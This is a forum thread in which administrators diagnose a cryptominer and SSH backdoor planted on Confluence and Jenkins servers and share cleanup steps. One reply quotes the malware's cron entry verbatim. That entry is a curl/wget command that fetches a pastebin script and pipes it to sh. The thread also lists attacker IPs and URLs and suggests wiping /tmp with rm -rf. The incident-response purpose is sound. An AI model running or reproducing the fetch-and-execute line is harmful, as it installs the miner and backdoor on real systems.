khugepageds eating all of the CPU

dovi5988
Contributor
April 11, 2019

Hi,


We have confluence hosted on our own box for a few years now with no issues. We have confluence running under it's own user. Randomly yesterday the process khugepageds showed up using 600% of the CPU (the box has 8 CPU's in total, the rest are being used by Java). I stopped confluence and the process lives on. When I look at the processes I see:

501 9063 625 0.0 144936 13700 ? Ssl Apr10 9422:08 /tmp/khugepageds =/tmp/kerberods TERM=linux JRE_HOME=/opt/atlassian/confluence/jre/ NLSPATH=/usr/dt/lib/nls/msg/%L/%N.cat PATH=/sbin:/usr/sbin:/bin:/usr/bin:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin RUNLEVEL=3 runlevel=3 PWD=/opt/atlassian/confluence/bin LANGSH_SOURCED=1 LANG=en_US.UTF-8 PREVLEVEL=N previous=N XFILESEARCHPATH=/usr/dt/app-defaults/%L/Dt CATALINA_OPTS= -Xms1280m -Xmx1280m -XX:MaxPermSize=384m -XX:+UseG1GC -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2017-11-21_01-34-45.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -XX:-PrintGCDetails -XX:+PrintGCTimeStamps -XX:-PrintTenuringDistribution CONF_USER=confluence CONSOLETYPE=serial SHLVL=7 HOME= CATALINA_PID=/opt/atlassian/confluence/work/catalina.pid UPSTART_INSTANCE= UPSTART_EVENTS=runlevel UPSTART_JOB=rc _=/tmp/kerberods __DAEMON_FD_3=2f746d702f2e583131756e6978: __DAEMON_STAGE=

 

The log file  was last written to on 2019-02-22. Since it stayed up once I stopped confluence is it safe to kill? I don't want to kill a process that can potentially break my confluence setup.

 

 

58 answers

4 votes
Johannes Schurer
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
April 11, 2019

Its a virus. khugepageds is an obfuscated crypto miner and there is a second process kerberods that is a backdoor and using SSH to open reverse tunnels.

It's triggered by the user's crontab Confluence is running under.

Stop and disable cron. Kill both processes. Update.

3 votes
Jeff Turner April 16, 2019

As a consultant, I cleaned up a client's hacked Confluence on Monday, and wrote up the experience:

What to do when your Confluence is hacked

Feedback welcome.

1 vote
Jeff Turner
Rising Star
Rising Star
Rising Stars are recognized for providing high-quality answers to other users. Rising Stars receive a certificate of achievement and are on the path to becoming Community Leaders.
April 25, 2019

According to this alertlogic.com blog, this vulnerability is also being exploited to launch ransomware.

1 vote
Zoran Pucar April 19, 2019

One problem is that the cron job can be hard to trace, depending on the user run by confluence.

Fortunately, the exploit doesn't do privilege escalation but can only run as confluence user. To bad if you are running confluence as root. 

Now, since the exploit can work differently depending on distro and user, one way to remove "the teeth" from the cron-job (while searching for it) is to remove the access to pastebin.com (note this is for IPv4. Pastebin.com has AAA records so if you are using IPv6 make sure you add those rules too. The method below is only for reference and won't stay of you reboot the server. This way even if you leave the cron-job running it won't work. 

[root@iowerwatch ~]# host pastebin.com

pastebin.com has address 104.20.209.21

pastebin.com has address 104.20.208.21

...

[root@iowerwatch ~]# iptables -A OUTPUT -d 104.20.209.21/32 -j REJECT --reject-with icmp-port-unreachable

[root@iowerwatch ~]# iptables -A OUTPUT -d 104.20.208.21/32 -j REJECT --reject-with icmp-port-unreachable

1 vote
abhijitsharma806 April 19, 2019

Hi All

I have also faced the same types of issues in my Jenkins Server 

/tmp/khugepageds use 200% CPU of my AWS t2.medium instances .

I have taken some steps. Please follow it it may help you guys.

1 - By using top/htop find the pid of /tmp/khugepageds (Most probably less number of pid is the parent pid)

2- By using that PID do # lsof -p 1919

3 - Then you can get the IP

4- Go to Your firewall rule INbound & OUTbound and block that IP.

5- Now check 
cat /var/spool/cron/crontabs/jenkins is thr any cron tab entry are available.

6- I have trace that IP location it is coming from United States and ISP is DigitalOcean LLC

Screenshot 2019-04-19 at 3.20.52 PM.pngScreenshot 2019-04-19 at 4.02.10 PM.pngScreenshot 2019-04-19 at 4.01.45 PM.pngScreenshot 2019-04-19 at 4.05.51 PM.pngScreenshot 2019-04-19 at 5.28.21 PM.png

1 vote
David Yu
Rising Star
Rising Star
Rising Stars are recognized for providing high-quality answers to other users. Rising Stars receive a certificate of achievement and are on the path to becoming Community Leaders.
April 18, 2019

Hope everyone was able to clean their systems up. I'm subscribed to all Tech Alerts to stay on top of security vulnerabilities, but in this case, Atlassian did not e-mail me, but another colleague notified me.

I reached out to their support and they fixed a bug in their mailer so it's a good time to also check your Email notification preferences at https://my.atlassian.com and ensure you're listed as a Technical Contact in your product.

1 vote
llondono
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
April 17, 2019

Was anyone able to find out how they were able to get the crontab entry added? Was it because they had that access to the specified addons and it had permission to the crontab?

1 vote
Andrea C
Contributor
April 16, 2019

I deleted the cron entry and it didn't reappear again.

1 vote
Deleted user April 15, 2019

Hi Robert,

I can't speak for your installation, but I can tell you what I did to mitigate on our system (in lieu of Atlassian's disappointing technical support...if I knew about the support bait and switch that would happen I would have heavily lobbied to not go this direction a few years ago).

Anyway—Log into console, Kill the kerberods and khugepageds processes by ascertaining the process id and killing them with sudo (hopefully you are not running Confluence as the root user)

pidof khugepageds
12345 <-- for example
sudo kill 12345

pidof kerberods
67890 <-- for example
sudo kill 12345

Open the Confluence user account's cron file in a text editor

sudo vim /var/spool/cron/confluence

Clear out any malicious entries (probably all of them unless you have added special entries).

I then followed Atlassian's guide to mitigate by manually disabling the WebDAV and Widget Connector plugins.

There has been no further evidence of malicious activity.

We were fortunate that we run this on an Amazon M4 and not on a T instance as this would have eaten up the CPU credits pretty quickly and removed our ability to even log into the console (or ran up a bill in unlimited mode which really could have sucked).

As soon as I can find an opportunity I am going to upgrade (can I just say major version upgrades are a pain).

1 vote
eleven12 April 11, 2019

Thank you Nick Smith! I noticed that the khugepageds was starting every 10 minutes and your note reminded me to check the user confluence's crontab entries. Sure enough, there was a suspicious entry that started every 10 minutes. I deleted it and the problem appears to have disappeared. I also upgraded to the latest version of Confluence.

0 votes
bluelight April 25, 2019

dd.heheda.tk resolves @ Cloudflare https://db-ip.com/104.18.59.79

I opened a support ticket https://support.cloudflare.com/hc/requests/1677155

Thanks

0 votes
Zoran Pucar April 20, 2019

Roo the bug allows remote execution! This means you can execute any command as confluence user on the system running it. Including adding crontab entries. 

0 votes
Roo
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
April 19, 2019

@dovi5988  I think what Ilondono was asking how the crontab entry was added.  I am trying to figure this out too. Can anyone chip-in?

0 votes
abhijitsharma806 April 19, 2019

I found one more cron entry for Jenkins user, and deleted that also.

Screenshot 2019-04-19 at 6.19.30 PM.png

0 votes
abhijitsharma806 April 19, 2019

Hi @dovi5988 

By using that /var/spool/cron/crontabs/jenkins, Inside that some URL are available if you open the URL you can found some scripts.

https://pastebin.com/raw/wR3ETdbi
https://pastebin.com/raw/Zk7Jv9j2
https://pastebin.com/raw/0Sxacvsh

 

Please find the screen shot also. And that IP already mentioned inside the script.

There are 2 IPS, Hope this will help.

119.9.106.27 and
104.130.210.206

Screenshot 2019-04-19 at 6.06.40 PM.pngScreenshot 2019-04-19 at 6.08.14 PM.pngScreenshot 2019-04-19 at 6.08.25 PM.png

0 votes
abhijitsharma806 April 19, 2019

8- Please try to clean /tmp folder (#rm -rf /tmp/*)

Thank you @dovi5988 If possible can you please check the attached screen shot, because I have ssh to my Jenkins server and do the lsof, and My home public IP's are different.

If it is my phone/home IP then why /tmp/khugepageds process is trying to access and after blocking in AWS NACL level it is not able to try to contact.

0 votes
Dovid Bender
Contributor
April 19, 2019

The digital Ocean IP seems to be the phone home IP. The other IP's that you see is the malware attacking other hosts in the same /16 as you. It's trying to get your host to attack others.

0 votes
abhijitsharma806 April 19, 2019

Try to remove the cron file. For me the location is /var/spool/cron/crontabs/jenkins

*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh

7- I have blocked the IP in AWS VPC NACL, after that CPU got reduced. If possible restart the Jenkins services.

This may help you guys.

 

Screenshot 2019-04-19 at 5.38.18 PM.pngScreenshot 2019-04-19 at 5.38.12 PM.pngScreenshot 2019-04-19 at 5.32.38 PM.png

0 votes
Dovid Bender
Contributor
April 17, 2019

They ran the curl command which called the bash script (via pastebin) which gets kerberods which creates the cronjob.

0 votes
Brian Hill
Contributor
April 17, 2019

Excellent write-up @Jeff Turner - thx for taking the extra time to document intervention steps for the benefit of others.

0 votes
Dovid Bender
Contributor
April 17, 2019

FYI: Another advisory was released..... Time to upgrade again. https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html

0 votes
Zoran Pucar April 16, 2019

Your settings are not working because you are not seeing khugepaged doing the load but another binary named khugepaged to "hide" in your system. It is a malicious software.

As previously stated there are ways of disabling it in this thread.

0 votes
Dovid Bender
Contributor
April 16, 2019

Feel free to email me at: dovi5988 -- gmail.com

0 votes
warthog April 16, 2019

I had set it up to run as confluence user. im looking into it now, just in case i changed my root pswd

Suggest an answer

Log in or Sign up to answer
TAGS
AUG Leaders

Atlassian Community Events